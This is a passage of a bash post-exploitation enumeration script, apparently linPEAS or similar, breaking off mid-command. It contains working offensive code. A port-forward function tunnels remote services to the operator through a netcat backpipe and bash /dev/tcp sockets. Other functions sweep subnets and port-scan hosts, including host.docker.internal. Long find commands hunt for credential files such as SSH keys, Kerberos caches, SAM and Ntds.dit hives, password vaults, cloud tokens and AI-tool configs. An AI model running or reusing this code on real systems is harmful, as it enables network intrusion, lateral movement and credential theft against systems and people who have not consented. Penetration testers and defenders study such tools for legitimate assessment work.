0<backpipe | nc -lvnp 9009 1>backpipe" 500 echo "" 501 read -p "Press any key when you have executed those commands" useless_var 502 bash -c "exec 3<>/dev/tcp/$REMOTE_IP/$REMOTE_PORT; exec 4<>/dev/tcp/$LOCAL_IP/9009; cat <&3 >&4 & cat <&4 >&3 &" 503 echo "If not error was indicated, your host port $LOCAL_PORT should be forwarded to $REMOTE_IP:$REMOTE_PORT" 504 } 505 select_nc (){ 506 #Select the correct configuration of the netcat found 507 NC_SCAN="$FOUND_NC -v -n -z -w 1" 508 $($NC_SCAN 127.0.0.1 65321 > /dev/null 2>&1) 509 if [ $? -eq 2 ] 510 then 511 NC_SCAN="timeout 1 $FOUND_NC -v -n" 512 fi 513 } 514 icmp_recon (){ 515 #Discover hosts inside a /24 subnetwork using ping (start pingging broadcast addresses) 516 IP3=$(echo $1 | cut -d "." -f 1,2,3) 517 (timeout 1 ping -b -c 1 "$IP3.255" 2>/dev/null | grep "icmp_seq" | sed -${E} "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${SED_RED},") & 518 (timeout 1 ping -b -c 1 "255.255.255.255" 2>/dev/null | grep "icmp_seq" | sed -${E} "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${SED_RED},") & 519 for j in $(seq 0 254) 520 do 521 (timeout 1 ping -b -c 1 "$IP3.$j" 2>/dev/null | grep "icmp_seq" | sed -${E} "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${SED_RED},") & 522 done 523 wait 524 } 525 tcp_recon (){ 526 #Discover hosts inside a /24 subnetwork using tcp connection to most used ports and selected ones 527 IP3=$(echo $1 | cut -d "." -f 1,2,3) 528 PORTS=$2 529 printf ${YELLOW}"[+]${GREEN} From $IP3 ${BLUE} Ports going to be scanned: $PORTS" $NC | tr '\n' " " 530 printf "$NC\n" 531 for p in $PORTS; do 532 for j in $(seq 1 254) 533 do 534 if [ "$FOUND_BASH" ] && [ "$(command -v timeout 2>/dev/null || echo -n '')" ]; then 535 timeout 2.5 $FOUND_BASH -c "(echo </dev/tcp/$IP3.$j/$p) 2>/dev/null && echo -e \"\n[+] Open port at: $IP3.$j:$p\"" & 536 elif [ "$NC_SCAN" ]; then 537 ($NC_SCAN "$IP3"."$j" "$p" 2>&1 | grep -iv "Connection refused\|No route\|Version\|bytes\| out" | sed -${E} "s,[0-9\.],${SED_RED},g") & 538 fi 539 done 540 wait 541 done 542 } 543 discovery_port_scan (){ 544 basic_net_info 545 #Check if IP and Netmask are correct and the use nc to find hosts. By default check ports: 22 80 443 445 3389 546 print_title "Internal Network Discovery - Finding hosts and scanning ports" 547 DISCOVERY=$1 548 MYPORTS=$2 549 IP=$(echo "$DISCOVERY" | cut -d "/" -f 1) 550 NETMASK=$(echo "$DISCOVERY" | cut -d "/" -f 2) 551 echo "Scanning: $DISCOVERY" 552 if [ -z "$IP" ] || [ -z "$NETMASK" ] || [ "$IP" = "$NETMASK" ]; then 553 printf $RED"[-] Err: Bad format. Example: 127.0.0.1/24\n"$NC; 554 if [ "$IP" = "$NETMASK" ]; then 555 printf $RED"[*] This options is used to find active hosts by scanning ports. If you want to perform a port scan of a host use the options: ${YELLOW}-i <IP> [-p <PORT(s)>]\n\n"$NC; 556 fi 557 printf ${BLUE}"$HELP"$NC; 558 exit 0 559 fi 560 PORTS="22 80 443 445 3389 $(echo $MYPORTS | tr ',' ' ')" 561 PORTS=$(echo "$PORTS" | tr " " "\n" | sort -u) #Delete repetitions 562 if [ "$NETMASK" -eq "24" ]; then 563 printf ${YELLOW}"[+]$GREEN Netmask /24 detected, starting...\n" $NC 564 tcp_recon "$IP" "$PORTS" 565 elif [ "$NETMASK" -eq "16" ]; then 566 printf ${YELLOW}"[+]$GREEN Netmask /16 detected, starting...\n" $NC 567 for i in $(seq 0 255) 568 do 569 NEWIP=$(echo "$IP" | cut -d "." -f 1,2).$i.1 570 tcp_recon "$NEWIP" "$PORTS" 571 done 572 else 573 printf $RED"[-] Err: Sorry, only netmask /24 and /16 are supported in port discovery mode. Netmask detected: $NETMASK\n"$NC; 574 exit 0 575 fi 576 } 577 tcp_port_scan (){ 578 #Scan open ports of a host. Default: nmap top 1000, but the user can select others 579 basic_net_info 580 print_title "Network Port Scanning" 581 IP=$1 582 PORTS="$2" 583 if [ -z "$PORTS" ]; then 584 printf ${YELLOW}"[+]${GREEN} From $IP ${BLUE} Ports going to be scanned: DEFAULT (nmap top 1000)" $NC | tr '\n' " " 585 printf "$NC\n" 586 PORTS="1 3 4 6 7 9 13 17 19 20 21 22 23 24 25 26 30 32 33 37 42 43 49 53 70 79 80 81 82 83 84 85 88 89 90 99 100 106 109 110 111 113 119 125 135 139 143 144 146 161 163 179 199 211 212 222 254 255 256 259 264 280 301 306 311 340 366 389 406 407 416 417 425 427 443 444 445 458 464 465 481 497 500 512 513 514 515 524 541 543 544 545 548 554 555 563 587 593 616 617 625 631 636 646 648 666 667 668 683 687 691 700 705 711 714 720 722 726 749 765 777 783 787 800 801 808 843 873 880 888 898 900 901 902 903 911 912 981 987 990 992 993 995 999 1000 1001 1002 1007 1009 1010 1011 1021 1022 1023 1024 1025 1026 1027 1028 1029 1030 1031 1032 1033 1034 1035 1036 1037 1038 1039 1040 1041 1042 1043 1044 1045 1046 1047 1048 1049 1050 1051 1052 1053 1054 1055 1056 1057 1058 1059 1060 1061 1062 1063 1064 1065 1066 1067 1068 1069 1070 1071 1072 1073 1074 1075 1076 1077 1078 1079 1080 1081 1082 1083 1084 1085 1086 1087 1088 1089 1090 1091 1092 1093 1094 1095 1096 1097 1098 1099 1100 1102 1104 1105 1106 1107 1108 1110 1111 1112 1113 1114 1117 1119 1121 1122 1123 1124 1126 1130 1131 1132 1137 1138 1141 1145 1147 1148 1149 1151 1152 1154 1163 1164 1165 1166 1169 1174 1175 1183 1185 1186 1187 1192 1198 1199 1201 1213 1216 1217 1218 1233 1234 1236 1244 1247 1248 1259 1271 1272 1277 1287 1296 1300 1301 1309 1310 1311 1322 1328 1334 1352 1417 1433 1434 1443 1455 1461 1494 1500 1501 1503 1521 1524 1533 1556 1580 1583 1594 1600 1641 1658 1666 1687 1688 1700 1717 1718 1719 1720 1721 1723 1755 1761 1782 1783 1801 1805 1812 1839 1840 1862 1863 1864 1875 1900 1914 1935 1947 1971 1972 1974 1984 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2013 2020 2021 2022 2030 2033 2034 2035 2038 2040 2041 2042 2043 2045 2046 2047 2048 2049 2065 2068 2099 2100 2103 2105 2106 2107 2111 2119 2121 2126 2135 2144 2160 2161 2170 2179 2190 2191 2196 2200 2222 2251 2260 2288 2301 2323 2366 2381 2382 2383 2393 2394 2399 2401 2492 2500 2522 2525 2557 2601 2602 2604 2605 2607 2608 2638 2701 2702 2710 2717 2718 2725 2800 2809 2811 2869 2875 2909 2910 2920 2967 2968 2998 3000 3001 3003 3005 3006 3007 3011 3013 3017 3030 3031 3052 3071 3077 3128 3168 3211 3221 3260 3261 3268 3269 3283 3300 3301 3306 3322 3323 3324 3325 3333 3351 3367 3369 3370 3371 3372 3389 3390 3404 3476 3493 3517 3527 3546 3551 3580 3659 3689 3690 3703 3737 3766 3784 3800 3801 3809 3814 3826 3827 3828 3851 3869 3871 3878 3880 3889 3905 3914 3918 3920 3945 3971 3986 3995 3998 4000 4001 4002 4003 4004 4005 4006 4045 4111 4125 4126 4129 4224 4242 4279 4321 4343 4443 4444 4445 4446 4449 4550 4567 4662 4848 4899 4900 4998 5000 5001 5002 5003 5004 5009 5030 5033 5050 5051 5054 5060 5061 5080 5087 5100 5101 5102 5120 5190 5200 5214 5221 5222 5225 5226 5269 5280 5298 5357 5405 5414 5431 5432 5440 5500 5510 5544 5550 5555 5560 5566 5631 5633 5666 5678 5679 5718 5730 5800 5801 5802 5810 5811 5815 5822 5825 5850 5859 5862 5877 5900 5901 5902 5903 5904 5906 5907 5910 5911 5915 5922 5925 5950 5952 5959 5960 5961 5962 5963 5987 5988 5989 5998 5999 6000 6001 6002 6003 6004 6005 6006 6007 6009 6025 6059 6100 6101 6106 6112 6123 6129 6156 6346 6389 6502 6510 6543 6547 6565 6566 6567 6580 6646 6666 6667 6668 6669 6689 6692 6699 6779 6788 6789 6792 6839 6881 6901 6969 7000 7001 7002 7004 7007 7019 7025 7070 7100 7103 7106 7200 7201 7402 7435 7443 7496 7512 7625 7627 7676 7741 7777 7778 7800 7911 7920 7921 7937 7938 7999 8000 8001 8002 8007 8008 8009 8010 8011 8021 8022 8031 8042 8045 8080 8081 8082 8083 8084 8085 8086 8087 8088 8089 8090 8093 8099 8100 8180 8181 8192 8193 8194 8200 8222 8254 8290 8291 8292 8300 8333 8383 8400 8402 8443 8500 8600 8649 8651 8652 8654 8701 8800 8873 8888 8899 8994 9000 9001 9002 9003 9009 9010 9011 9040 9050 9071 9080 9081 9090 9091 9099 9100 9101 9102 9103 9110 9111 9200 9207 9220 9290 9415 9418 9485 9500 9502 9503 9535 9575 9593 9594 9595 9618 9666 9876 9877 9878 9898 9900 9917 9929 9943 9944 9968 9998 9999 10000 10001 10002 10003 10004 10009 10010 10012 10024 10025 10082 10180 10215 10243 10566 10616 10617 10621 10626 10628 10629 10778 11110 11111 11967 12000 12174 12265 12345 13456 13722 13782 13783 14000 14238 14441 14442 15000 15002 15003 15004 15660 15742 16000 16001 16012 16016 16018 16080 16113 16992 16993 17877 17988 18040 18101 18988 19101 19283 19315 19350 19780 19801 19842 20000 20005 20031 20221 20222 20828 21571 22939 23502 24444 24800 25734 25735 26214 27000 27352 27353 27355 27356 27715 28201 30000 30718 30951 31038 31337 32768 32769 32770 32771 32772 32773 32774 32775 32776 32777 32778 32779 32780 32781 32782 32783 32784 32785 33354 33899 34571 34572 34573 35500 38292 40193 40911 41511 42510 44176 44442 44443 44501 45100 48080 49152 49153 49154 49155 49156 49157 49158 49159 49160 49161 49163 49165 49167 49175 49176 49400 49999 50000 50001 50002 50003 50006 50300 50389 50500 50636 50800 51103 51493 52673 52822 52848 52869 54045 54328 55055 55056 55555 55600 56737 56738 57294 57797 58080 60020 60443 61532 61900 62078 63331 64623 64680 65000 65129 65389" 587 else 588 PORTS="$(echo $PORTS | tr ',' ' ')" 589 printf ${YELLOW}"[+]${GREEN} From $IP ${BLUE} Ports going to be scanned: $PORTS" $NC | tr '\n' " " 590 printf "$NC\n" 591 fi 592 for p in $PORTS; do 593 if [ "$FOUND_BASH" ]; then 594 $FOUND_BASH -c "(echo </dev/tcp/$IP/$p) 2>/dev/null && echo -n \"[+] Open port at: $IP:$p\"" & 595 elif [ "$NC_SCAN" ]; then 596 ($NC_SCAN "$IP" "$p" 2>&1 | grep -iv "Connection refused\|No route\|Version\|bytes\| out" | sed -${E} "s,[0-9\.],${SED_RED},g") & 597 fi 598 done 599 wait 600 } 601 discover_network (){ 602 #Check if IP and Netmask are correct and the use fping or ping to find hosts 603 basic_net_info 604 print_title "Network Discovery" 605 DISCOVERY=$1 606 IP=$(echo "$DISCOVERY" | cut -d "/" -f 1) 607 NETMASK=$(echo "$DISCOVERY" | cut -d "/" -f 2) 608 if [ -z "$IP" ] || [ -z "$NETMASK" ]; then 609 printf $RED"[-] Err: Bad format. Example: 127.0.0.1/24"$NC; 610 printf ${BLUE}"$HELP"$NC; 611 exit 0 612 fi 613 #Using fping if possible 614 if [ "$FPING" ]; then 615 $FPING -a -q -g "$DISCOVERY" | sed -${E} "s,.*,${SED_RED}," 616 #Loop using ping 617 else 618 if [ "$NETMASK" -eq "24" ]; then 619 printf ${YELLOW}"[+]$GREEN Netmask /24 detected, starting...\n$NC" 620 icmp_recon $IP 621 elif [ "$NETMASK" -eq "16" ]; then 622 printf ${YELLOW}"[+]$GREEN Netmask /16 detected, starting...\n$NC" 623 for i in $(seq 1 254) 624 do 625 NEWIP=$(echo "$IP" | cut -d "." -f 1,2).$i.1 626 icmp_recon "$NEWIP" 627 done 628 else 629 printf $RED"[-] Err: Sorry, only Netmask /24 and /16 supported in ping mode. Netmask detected: $NETMASK"$NC; 630 exit 0 631 fi 632 fi 633 } 634 if [ "$PORTS" ]; then 635 if [ "$SCAN_BAN_GOOD" ]; then 636 if [ "$(echo -n $PORTS | sed 's,[0-9, ],,g')" ]; then 637 printf $RED"[-] Err: Symbols detected in the port, for discovering purposes select only 1 port\n"$NC; 638 printf ${BLUE}"$HELP"$NC; 639 exit 0 640 else 641 #Select the correct configuration of the netcat found 642 select_nc 643 fi 644 else 645 printf $RED" Err: Port scan not possible, any netcat in PATH\n"$NC; 646 printf ${BLUE}"$HELP"$NC; 647 exit 0 648 fi 649 fi 650 if [ "$DISCOVERY" ]; then 651 if [ "$PORTS" ]; then 652 discovery_port_scan $DISCOVERY $PORTS 653 else 654 if [ "$DISCOVER_BAN_GOOD" ]; then 655 discover_network $DISCOVERY 656 else 657 printf $RED" Err: Discovery not possible, no fping or ping in PATH\n"$NC; 658 fi 659 fi 660 exit 0 661 elif [ "$IP" ]; then 662 select_nc 663 tcp_port_scan $IP "$PORTS" 664 exit 0 665 fi 666 if [ "$PORT_FORWARD" ]; then 667 if ! [ "$FOUND_BASH" ]; then 668 printf $RED"[-] Err: Port forwarding not possible, no bash in PATH\n"$NC; 669 exit 0 670 fi 671 LOCAL_IP="$(echo -n $PORT_FORWARD | cut -d ':' -f 1)" 672 LOCAL_PORT="$(echo -n $PORT_FORWARD | cut -d ':' -f 2)" 673 REMOTE_IP="$(echo -n $PORT_FORWARD | cut -d ':' -f 3)" 674 REMOTE_PORT="$(echo -n $PORT_FORWARD | cut -d ':' -f 4)" 675 if ! [ "$LOCAL_IP" ] || ! [ "$LOCAL_PORT" ] || ! [ "$REMOTE_IP" ] || ! [ "$REMOTE_PORT" ]; then 676 printf $RED"[-] Err: Invalid port forwarding configuration: $PORT_FORWARD. The format is: LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT\nFor example: 10.10.14.8:7777:127.0.0.1:8000"$NC; 677 exit 0 678 fi 679 #Check if LOCAL_PORT is a number 680 if ! [ "$(echo $LOCAL_PORT | grep -E '^[0-9]+$')" ]; then 681 printf $RED"[-] Err: Invalid port forwarding configuration: $PORT_FORWARD. The format is: LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT\nFor example: 10.10.14.8:7777:127.0.0.1:8000"$NC; 682 fi 683 #Check if REMOTE_PORT is a number 684 if ! [ "$(echo $REMOTE_PORT | grep -E '^[0-9]+$')" ]; then 685 printf $RED"[-] Err: Invalid port forwarding configuration: $PORT_FORWARD. The format is: LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT\nFor example: 10.10.14.8:7777:127.0.0.1:8000"$NC; 686 fi 687 port_forward "$LOCAL_IP" "$LOCAL_PORT" "$REMOTE_IP" "$REMOTE_PORT" 688 exit 0 689 fi 690 if [ "$AUTO_NETWORK_SCAN" ]; then 691 basic_net_info 692 if ! [ "$FOUND_NC" ] && ! [ "$FOUND_BASH" ]; then 693 printf $RED"[-] $SCAN_BAN_BAD\n$NC" 694 echo "The network is not going to be scanned..." 695 elif ! [ "$(command -v ifconfig)" ] && ! [ "$(command -v ip || echo -n '')" ]; then 696 printf $RED"[-] No ifconfig or ip commands, cannot find local ips\n$NC" 697 echo "The network is not going to be scanned..." 698 else 699 print_2title "Scanning local networks (using /24)" 700 if ! [ "$PING" ] && ! [ "$FPING" ]; then 701 printf $RED"[-] $DISCOVER_BAN_BAD\n$NC" 702 fi 703 select_nc 704 local_ips=$( (ip a 2>/dev/null || ifconfig) | grep -Eo 'inet[^6]\S+[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | awk '{print $2}' | grep -E "^10\.|^172\.|^192\.168\.|^169\.254\.") 705 printf "%s\n" "$local_ips" | while read local_ip; do 706 if ! [ -z "$local_ip" ]; then 707 print_3title "Discovering hosts in $local_ip/24" 708 if [ "$PING" ] || [ "$FPING" ]; then 709 discover_network "$local_ip/24" | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Network Discovery" | grep -v "Network Discovery" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' > $Wfolder/.ips.tmp 710 fi 711 discovery_port_scan "$local_ip/24" 22 | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Ports going to be scanned" | grep -v "Ports going to be scanned" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' >> $Wfolder/.ips.tmp 712 sort $Wfolder/.ips.tmp | uniq > $Wfolder/.ips 713 rm $Wfolder/.ips.tmp 2>/dev/null 714 while read disc_ip; do 715 me="" 716 if [ "$disc_ip" = "$local_ip" ]; then 717 me=" (local)" 718 fi 719 echo "Scanning top ports of ${disc_ip}${me}" 720 (tcp_port_scan "$disc_ip" "" | grep -A 1000 "Ports going to be scanned" | grep -v "Ports going to be scanned" | sort | uniq) 2>/dev/null 721 echo "" 722 done < $Wfolder/.ips 723 rm $Wfolder/.ips 2>/dev/null 724 echo "" 725 fi 726 done 727 print_3title "Scanning top ports of host.docker.internal" 728 (tcp_port_scan "host.docker.internal" "" | grep -A 1000 "Ports going to be scanned" | grep -v "Ports going to be scanned" | sort | uniq) 2>/dev/null 729 echo "" 730 fi 731 exit 0 732 fi 733 734 if [ "$SEARCH_IN_FOLDER" ]; then 735 printf $GREEN"Caching directories "$NC 736 CONT_THREADS=0 737 # FIND ALL KNOWN INTERESTING SOFTWARE FILES 738 FIND_DIR_CUSTOM=`eval_bckgrd "find $SEARCH_IN_FOLDER -type d -name \"origin\" -o -name \".kube*\" -o -name \"k3s\" -o -name \"*jenkins\" -o -name \"sites-enabled\" -o -name \"varnish\" -o -name \"microk8s\" -o -name \"concourse-keys\" -o -name \".vnc\" -o -name \"Google Password Sync\" -o -name \"session.d\" -o -name \"services\" -o -name \"containerd\" -o -name \"system-services\" -o -name \".docker\" -o -name \"seeddms*\" -o -name \"Google Cloud Directory Sync\" -o -name \"crio\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"system-local.d\" -o -name \"ldap\" -o -name \".claude\" -o -name \"concourse-auth\" -o -name \"rke2\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sentry\" -o -name \"roundcube\" -o -name \"kube-proxy\" -o -name \"mysql\" -o -name \"kubernetes.io\" -o -name \".password-store\" -o -name \"kubelet\" -o -name \".cloudflared\" -o -name \"etcd\" -o -name \"k0s\" -o -name \"net.d\" -o -name \"keyrings\" -o -name \"bind\" -o -name \"gh\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"pam.d\" -o -name \"kubernetes\" -o -name \"postfix\" -o -name \"nginx\" -o -name \"doctl\" -o -name \"environments\" -o -name \"system.d\" -o -name \"gcloud\" -o -name \"dirsrv\" -o -name \"wpa_supplicant\" -o -name \"ErrorRecords\" -o -name \".bluemix\" -o -name \".codex\" -o -name \".gemini\" -o -name \"cacti\" -o -name \"apt.conf.d\" -o -name \"ipa\" -o -name \".cursor\" -o -name \"system-connections\" -o -name \"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 739 FIND_CUSTOM=`eval_bckgrd "find $SEARCH_IN_FOLDER -name \"*.timer\" -o -name \".boto\" -o -name \"password*.ibd\" -o -name \"fastcgi_params\" -o -name \"ssh-agent.sock\" -o -name \".bashrc\" -o -name \"my.ini\" -o -name \"*.pem\" -o -name \"scclient.exe\" -o -name \"krb5cc_*\" -o -name \"crio.sock\" -o -name \"ffftp.ini\" -o -name \"sitemanager.xml\" -o -name \"bitcoin.conf\" -o -name \"*.der\" -o -name \"wp-config.php\" -o -name \"*knockd*\" -o -name \"glusterfs.key\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".pgpass\" -o -name \"plum.sqlite\" -o -name \"gitlab.rm\" -o -name \"state.vscdb.backup\" -o -name \"atlantis.db\" -o -name \"hosts.equiv\" -o -name \"default.sav\" -o -name \"sess_*\" -o -name \"snyk.json\" -o -name \"*vnc*.txt\" -o -name \"rsyncd.secrets\" -o -name \"access_tokens.db\" -o -name \"AzureRMContext.json\" -o -name \"*.asc\" -o -name \"containerd.sock\" -o -name \"software\" -o -name \".git-credentials\" -o -name \"*.rdg\" -o -name \"wsl.exe\" -o -name \"backup\" -o -name \"sslkeylog.log\" -o -name \"elasticsearch.y*ml\" -o -name \"passbolt.php\" -o -name \"*.tfstate\" -o -name \"anaconda-ks.cfg\" -o -name \"ipsec.conf\" -o -name \"storage.php\" -o -name \"cloud.cfg\" -o -name \"pg_hba.conf\" -o -name \"psk.txt\" -o -name \"aliases\" -o -name \"unattend.inf\" -o -name \"sssd.conf\" -o -name \".profile\" -o -name \"system.sav\" -o -name \"snyk.config.json\" -o -name \"sites.ini\" -o -name \"*.gpg\" -o -name \"sentry.conf.py\" -o -name \"zabbix_server.conf\" -o -name \"AppEvent.Evt\" -o -name \"gpg-agent.conf\" -o -name \"config.xml\" -o -name \".vault-token\" -o -name \"filezilla.xml\" -o -name \".env*\" -o -name \"authorized_hosts\" -o -name \"krb5.conf\" -o -name \"rsyncd.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"passwd.ibd\" -o -name \"adc.json\" -o -name \"api_key\" -o -name \"FreePBX.conf\" -o -name \"admin.conf\" -o -name \"KeePass.ini\" -o -name \"*.keyring\" -o -name \".wgetrc\" -o -name \"secrets.ldb\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.kdbx\" -o -name \".plan\" -o -name \"*.vhd\" -o -name \"environment\" -o -name \"ssh*config\" -o -name \"*.crt\" -o -name \"error.log\" -o -name \"*vnc*.ini\" -o -name \".lesshst\" -o -name \"*.gnupg\" -o -name \"rpcd\" -o -name \"rocketchat.service\" -o -name \"docker.sock\" -o -name \"exports\" -o -name \"index.dat\" -o -name \"crontab-ui.service\" -o -name \"fat.config\" -o -name \"unattend.xml\" -o -name \"legacy_credentials.db\" -o -name \"secret.asc\" -o -name \"autologin.conf\" -o -name \"server.xml\" -o -name \"mysqld.cnf\" -o -name \"glusterfs.ca\" -o -name \"known_hosts\" -o -name \"creds*\" -o -name \"*.ftpconfig\" -o -name \"firebase-tools.json\" -o -name \".claude.json\" -o -name \"mongod*.conf\" -o -name \"sysprep.inf\" -o -name \"httpd.conf\" -o -name \"gitlab.yml\" -o -name \"sysprep.xml\" -o -name \"agent.*\" -o -name \"NetSetup.log\" -o -name \"protecteduserkey.bin\" -o -name \"pgadmin4.db\" -o -name \"php.ini\" -o -name \"*.ovpn\" -o -name \"passwd\" -o -name \"trustdb.gpg\" -o -name \"ftp.config\" -o -name \"autounattend.xml\" -o -name \"*.vhdx\" -o -name \"secrets.yml\" -o -name \"hostapd.conf\" -o -name \"*.maintenance*\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"*.pcap\" -o -name \"storage.json\" -o -name \".sudo_as_admin_successful\" -o -name \"*.csr\" -o -name \"ConsoleHost_history.txt\" -o -name \"KeePass.config*\" -o -name \"kcpassword\" -o -name \"redis.conf\" -o -name \"glusterfs.pem\" -o -name \"web*.config\" -o -name \"mosquitto.conf\" -o -name \"webserver_config.py\" -o -name \"sip.conf\" -o -name \"*credential*\" -o -name \"SAM\" -o -name \"*.key\" -o -name \"printers.xml\" -o -name \"pubring.kbx\" -o -name \".mcp.json\" -o -name \"kubelet.conf\" -o -name \"service_principal_entries.bin\" -o -name \".ldaprc\" -o -name \".recently-used.xbel\" -o -name \".Xauthority\" -o -name \"accessTokens.json\" -o -name \"pgadmin*.db\" -o -name \"*config*.php\" -o -name \"unattend.txt\" -o -name \"credentials.db\" -o -name \".flyrc\" -o -name \"iis6.log\" -o -name \"credentials.tfrc.json\" -o -name \"security.sav\" -o -name \"cesi.conf\" -o -name \"Dockerfile\" -o -name \"*.psk\" -o -name \"kadm5.acl\" -o -name \"scheduledtasks.xml\" -o -name \"*.cer\" -o -name \"id_rsa*\" -o -name \"racoon.conf\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.socket\" -o -name \"ddclient.conf\" -o -name \"settings.php\" -o -name \"TokenCache.dat\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"*.sqlite\" -o -name \"*vnc*.xml\" -o -name \"setupinfo.bak\" -o -name \"nginx.conf\" -o -name \".roadtools_auth\" -o -name \".erlang.cookie\" -o -name \"pwd.ibd\" -o -name \".git\" -o -name \"ftp.ini\" -o -name \"recentservers.xml\" -o -name \".htpasswd\" -o -name \"*.tf\" -o -name \"appcmd.exe\" -o -name \"msal_http_cache.bin\" -o -name \"*.swp\" -o -name \".mylogin.cnf\" -o -name \"*.pcapng\" -o -name \"RDCMan.settings\" -o -name \"postgresql.conf\" -o -name \"crontab.db\" -o -name \"id_dsa*\" -o -name \".credentials.json\" -o -name \"*.pgp\" -o -name \"rktlet.sock\" -o -name \"grafana.ini\" -o -name \"frakti.sock\" -o -name \"config.php\" -o -name \"*.vmdk\" -o -name \"docker.socket\" -o -name \"credentials.xml\" -o -name \"gvm-tools.conf\" -o -name \"smb.conf\" -o -name \"db.php\" -o -name \"vsftpd.conf\" -o -name \"secring.gpg\" -o -name \"snmpd.conf\" -o -name \"*.pfx\" -o -name \".github\" -o -name \".k5login\" -o -name \"https-xampp.conf\" -o -name \"msal_token_cache.bin\" -o -name \"database.php\" -o -name \"*.db\" -o -name \"*.jks\" -o -name \"*.viminfo\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \"ntuser.dat\" -o -name \"*_history*\" -o -name \"*kubeconfig*\" -o -name \"amportal.conf\" -o -name \"pagefile.sys\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"unattended.xml\" -o -name \"keys.log\" -o -name \"Ntds.dit\" -o -name \"groups.xml\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"airflow.cfg\" -o -name \"state.vscdb\" -o -name \"winscp.ini\" -o -name \"mariadb.cnf\" -o -name \"log4j-core*.jar\" -o -name \"*.p12\" -o -name \"KeePass.enforced*\" -o -name \"bootstrap-kubelet.conf\" -o -name \"https.conf\" -o -name \"software.sav\" -o -name \"*.pub\" -o -name \"apt.conf\" -o -name \"service_principal_entries.json\" -o -name \"access.log\" -o -name \".google_authenticator\" -o -name \"*vnc*.c*nf*\" -o -name \"*password*\" -o -name \"000-default.conf\" -o -name \".secrets.mkey\" -o -name \"authorized_keys\" -o -name \"azureProfile.json\" -o -name \"ws_ftp.ini\" -o -name \"dockershim.sock\" -o -name \"Elastix.conf\" -o -name \"autologin\" -o -name \"*.service\" -o -name \".rhosts\" -o -name \"debian.cnf\" -o -name \"clouds.config\" -o -name \"jetty-realm.properties\" -o -name \"*.keytab\" -o -name \"bash.exe\" -o -name \"msal_token_cache.json\" -o -name \"drives.xml\" -o -name \".msmtprc\" -o -name \"FreeSSHDservice.ini\" -o -name \"SYSTEM\" -o -name \"setupinfo\" -o -name \"*.sqlite3\" -o -name \"kibana.y*ml\" -o -name \"tomcat-users.xml\" -o -name \"hudson.util.Secret\" -o -name \"ipsec.secrets\" -o -name \"backups\" -o -name \"master.key\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 740 741 wait # Always wait at the end 742 CONT_THREADS=0 #Reset the threads counter 743 elif echo $CHECKS | grep -q procs_crons_timers_srvcs_sockets || echo $CHECKS | grep -q software_information || echo $CHECKS | grep -q interesting_files; then 744 printf $GREEN"Caching directories "$NC 745 CONT_THREADS=0 746 # FIND ALL KNOWN INTERESTING SOFTWARE FILES 747 FIND_DIR_APPLICATIONS=`eval_bckgrd "find ${ROOT_FOLDER}applications -type d -name \".kube*\" -o -name \"*jenkins\" -o -name \"sites-enabled\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \".vnc\" -o -name \"Google Password Sync\" -o -name \".docker\" -o -name \"seeddms*\" -o -name \"Google Cloud Directory Sync\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"ldap\" -o -name \".claude\" -o -name \"concourse-auth\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sentry\" -o -name \"roundcube\" -o -name \"mysql\" -o -name \".password-store\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"gh\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \"nginx\" -o -name \"doctl\" -o -name \"environments\" -o -name \"gcloud\" -o -name \"dirsrv\" -o -name \"ErrorRecords\" -o -name \".bluemix\" -o -name \".codex\" -o -name \".gemini\" -o -name \"cacti\" -o -name \"apt.conf.d\" -o -name \"ipa\" -o -name \".cursor\" -o -name \"legacy_credentials\" -o -name \"couchdb\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 748 FIND_DIR_BIN=`eval_bckgrd "find ${ROOT_FOLDER}bin -type d -name \".kube*\" -o -name \"*jenkins\" -o -name \"sites-enabled\" -o -name \"varnish\" -o -name \"concourse-keys\" -o -name \".vnc\" -o -name \"Google Password Sync\" -o -name \".docker\" -o -name \"seeddms*\" -o -name \"Google Cloud Directory Sync\" -o -name \"zabbix\" -o -name \".svn\" -o -name \"ldap\" -o -name \".claude\" -o -name \"concourse-auth\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \"sentry\" -o -name \"roundcube\" -o -name \"mysql\" -o -name \".password-store\" -o -name \".cloudflared\" -o -name \"keyrings\" -o -name \"gh\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"postfix\" -o -name \"nginx\" -o -name \"doctl\" -o -name \"environments\" -o -name \"gcloud\" -o -name \"dirsrv\" -o -name \"ErrorRecords\" -o -name \".bluemix\" -o -name 